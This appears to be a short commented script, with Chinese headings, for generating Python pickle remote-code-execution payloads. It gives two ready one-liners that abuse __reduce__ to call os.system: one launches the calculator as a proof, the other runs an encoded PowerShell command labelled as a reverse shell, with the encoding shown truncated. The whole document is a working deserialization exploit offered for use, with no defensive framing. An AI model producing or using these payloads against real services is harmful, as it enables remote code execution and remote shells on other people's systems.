# Pickle RCE Payload 生成脚本
# 使用方式：python -c "import pickle,base64; ..."
# ---------- 弹窗验证 ----------
# python -c "
# import pickle, base64, os
# class RCE:
#     def __reduce__(self):
#         return (os.system, ('calc',))
# print(base64.b64encode(pickle.dumps(RCE())).decode())
# "
# ---------- 反弹 Shell ----------
# python -c "
# import pickle, base64, os
# class RCE:
#     def __reduce__(self):
#         return (os.system, ('powershell -e JABjAGwAaQBl...',))
# print(base64.b64encode(pickle.dumps(RCE())).decode())
# "
